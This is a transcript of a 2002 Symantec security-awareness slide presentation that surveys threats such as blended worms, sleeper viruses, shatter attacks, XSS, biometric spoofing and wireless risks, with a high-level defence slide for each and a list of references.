some security hot issues
DESCRIPTION
Some Security Hot Issues. Allan Wall BCS North London Branch Meeting 13 th November 2002. Who is the enemy ?. Classification. Attacker Description. Target. Results. Computer Crime. Vandal, Script Kiddie, Packet Monkey. Email, Web Sites. Downtime, Defacement, Denial of Service. - PowerPoint PPT PresentationTRANSCRIPT
2001 Symantec Corporation, All Rights Reserved
Some Security Hot IssuesAllan Wall
BCS North London Branch Meeting
13th November 2002
2 – 2001 Symantec Corporation, All Rights Reserved
Who is the enemy ?
DestructionPhysical Infrastructure
Terrorists,Non-State Actors
Cyber Terrorist
Political Power, Balance Change
Political Infrastructure
Government Organization
Information Warfare
Monetary GainAssets‘Criminal’ Cracker,‘Black Hat’
Computer Crime
Downtime, Defacement,Denial of Service
Email,Web Sites
Vandal,Script Kiddie,Packet Monkey
Computer Crime
ResultsTargetAttacker Description
Classification
3 – 2001 Symantec Corporation, All Rights Reserved
Where do the threats come from?
Country Attacks
Israel 33.1
Hong Kong 22.1
France 19.9
Belgium 17.6
Thailand 15.9
Countries > 1M Internet Users
Country Attacks
Kuwait 50.8
Iran 30.8
Peru 24.5
Chile 24.4
Nigeria 22.3
Attacks per 10,000 Internet Users
Countries < 1M Internet Users
Jan. – Jun. 2002 (Symantec 2002)
4 – 2001 Symantec Corporation, All Rights Reserved
The Redundant Message..Cost of Damage
CodeRed Estimated: 2.5 Billion Dollars
Nimda Cost Estimated: 500+ Million Dollars
186 Respondents in 2001 CSI/FBI Survey
• $151,230,100 – Theft of proprietary information
• $45,288,150 – Virus
• $35,001,650 – Insider Net Abuse
• $19,066,601 – System Penetration
• $4,283,600 – Denial of Service
5 – 2001 Symantec Corporation, All Rights Reserved
The Blended Threat
Isn’t going away Combines hacking, DoS, and worm-like propagation
Most recent example – W32.Bugbear.mm Mass mailing worm It’s own SMTP engine Discovers and utilises network shares to spread Does keystroke logging Creates a backdoor for access Attempts to disable AV and personal firewall products Due to a bug in shared drive exploit, it can overwhelm shared printers causing
them to print reams of gibberish
6 – 2001 Symantec Corporation, All Rights Reserved
Blended Threat Defence
Proactive vulnerability management
Security in layers
Security in depth
Superior security response
7 – 2001 Symantec Corporation, All Rights Reserved
The Sleeper Virus
Not a fast mailer or a mass mailer - It's slower and more subtle
Hybris - a computer worm that uses encrypted plug-ins to
update itself over the internet
Sits quietly monitoring email traffic
Compiles list of addresses and slowly leaks email infections
Morphs depending on updates
8 – 2001 Symantec Corporation, All Rights Reserved
The Sleeper Virus Defence
Update virus definitions frequently
Treat email attachments with suspicion
Use a personal firewall
9 – 2001 Symantec Corporation, All Rights Reserved
Shatter Attacks
The mechanism used is the Win32 API, which has been relatively
static since Windows NT 3.5 was released in July 1993
Microsoft cannot change it – without full scale redesign
An example – Windows messaging / queuing
An attacker can use these techniques to escalate their
privileges
10 – 2001 Symantec Corporation, All Rights Reserved
Shatter Attacks - Defence
Full-scale Windows redesign (scrapping Win32)
Better design by every Windows application vendor
Protect your windows systems to make it hard for undesirables
to get access they can exploit
Needs continual monitoring
11 – 2001 Symantec Corporation, All Rights Reserved
Cross site scripting attacks - XSS
“Expert hacks Hotmail in 1 line of code!”
Attackers will inject JavaScript, VBScript, ActiveX, HTML, or
Flash to fool a user
Exploits dynamic web-site content resulting in: account hijacking changing of user settings cookie theft/poisoning false advertising
Will become more common, even automated
12 – 2001 Symantec Corporation, All Rights Reserved
XSS attacks - Defence
Design web pages that validates user input
HTML escaping
Using PERL scripting tools designed to help
13 – 2001 Symantec Corporation, All Rights Reserved
Biometrics
• More secure and stronger identification.• moving away from (multiple) IDs/Passwords, reducing risk from
“lost” or loaned credentials (including tokens).
• Most common • Fingerprint, hand, iris / retina / facial / voice recognition.
• Provides the inextricable link – the guarantee
that the registered user is actually present.
Or does it…….?
14 – 2001 Symantec Corporation, All Rights Reserved
Biometrics
• Relatively high cost solutions, immature technology – bigger
cost/risk if they fail (but cheaper to support)
• Privacy and intrusiveness issues
• Accuracy – false positive / false negative rates• Facial recognition: only 60-80% accurate, 1 in 100 false +ve
• Unproven/untested technologies – just how hard/easy are they to
spoof?
• Example: Finger print recognition• Can be spoofed for <$20 in about 30 minutes using “jelly” fingers
15 – 2001 Symantec Corporation, All Rights Reserved
16 – 2001 Symantec Corporation, All Rights Reserved
Background security checks
Less than 60% of organisations carry out checks on new staff
IT Security Professionals
Banking
Critical infrastructure EnergyTelecoms Utilities
Employees are still the weakest link
17 – 2001 Symantec Corporation, All Rights Reserved
Targeted Attacks
Focussed attack on specific targets within the organisation:• Spoof email or CD.
Social engineering to create “familiarity”:• Message on business opportunity,hobby, interest.
Low activity malware implanted:• Disable AV.• Collecting keystrokes or audio.• Email data out.
Response – “Combined interoperable defence.”
18 – 2001 Symantec Corporation, All Rights Reserved
The Good News…The Bad News…Airborne Viruses
Personal, Local and Wide Area Personal, Local and Wide Area Connectivity is enabling Connectivity is enabling
the Enterprise the Enterprise
Source: Symantec 2002
802.11 can be visible from over a mile
away.
Bluetooth
30 feet
2.5 and 3G can be visible for many
miles
and exposingand exposing to new to new security risksecurity risk
19 – 2001 Symantec Corporation, All Rights Reserved
Airborne Viruses - Defence
Unless you don’t have assets worth protecting . . .
. . . Don’t use wireless technology without putting
in the countermeasures that are available!
20 – 2001 Symantec Corporation, All Rights Reserved
The law of requisite variety (Prof.Ross Ashby)
Formal Descriptions
The abundance or variety of alternative control actions which a control mechanism is capable of executing must be at least equal to the abundance or variety of the spontaneous fluctuations which have to be corrected by the control mechanism, if the control mechanism is to perform its function effectively.
Only a greater amount of variety in a regulator can control the variety present in a given system.
The larger the variety of actions available to a control system. The larger the variety of perturbations it is able to compensate
Only variety can destroy variety.
There must be as much variety in the control mechanism as there is variety in
the threat
21 – 2001 Symantec Corporation, All Rights Reserved
Ways to win..
Proactive security – mitigate your risk (do not just
rely on technology..)
Threats are defeated by Information + Technology
Superior response capability
“In-source” / outsource
Size and flexibility in defence
22 – 2001 Symantec Corporation, All Rights Reserved
References
Symantec Figures: Internet Security Threat Report Volume II
http://enterprisesecurity.symantec.com/content.cfm?EID=0&ArticleID=1539
Blended Threats: http://www.informationweek.com/story/IWK20020516S0020
http://www.symantec.com/symadvantage/012/blended.html
Sleeper Virus: http://news.zdnet.co.uk/story/0,,t269-s2083648,00.html
Shatter Attacks: http://security.tombom.co.uk/shatter.html
Cross Site Scripting: http://www.securiteam.com/securityreviews/5FP000A81E.html
Biometrics – BBC: http://news.bbc.co.uk/1/hi/sci/tech/1991517.stm
Airborne Virus: http://www.networkmagazine.com/article/NMG20001130S0001/2
Ross Ashby: http://pespmc1.vub.ac.be/ASHBBOOK.html